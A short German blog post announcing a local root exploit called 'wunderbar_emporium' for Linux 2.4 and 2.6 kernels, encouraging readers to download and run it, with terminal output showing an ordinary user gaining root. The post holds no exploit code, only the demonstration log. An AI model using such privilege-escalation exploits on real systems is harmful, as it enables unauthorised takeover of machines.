local root exploit fuer alle linux kernel seit 2001

Es gibt einen neuen local root exploit fuer den Linux Kernel fuer alle 2.4er und 2.6er Kernel seit 2001. Funktioniert ganz wunderbar hier und ueberall, einfach wunderbar_emporium herunterladen und ausfuehren und siehe selbst:

jan@scherge:~/wunderbar_emporium$ id
uid=1003(jan) gid=1003(jan) Gruppen=114(wheel),1003(jan),1004(userbet)
jan@scherge:~/wunderbar_emporium$ ./wunderbar_emporium.sh 
 [+] MAPPED ZERO PAGE!
 [+] Resolved sel_read_enforce to 0xffffffff802f334a
 [+] got ring0!
 [+] detected 2.6 style 4k stacks
sh: mplayer: command not found
 [+] Disabled security of : nothing, what an insecure machine!
 [+] Got root!
sh-3.1# id
uid=0(root) gid=0(root) Gruppen=114(wheel),1003(jan),1004(userbet)
sh-3.1#

prego

/me... prego!

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

This site uses Akismet to reduce spam. Learn how your comment data is processed.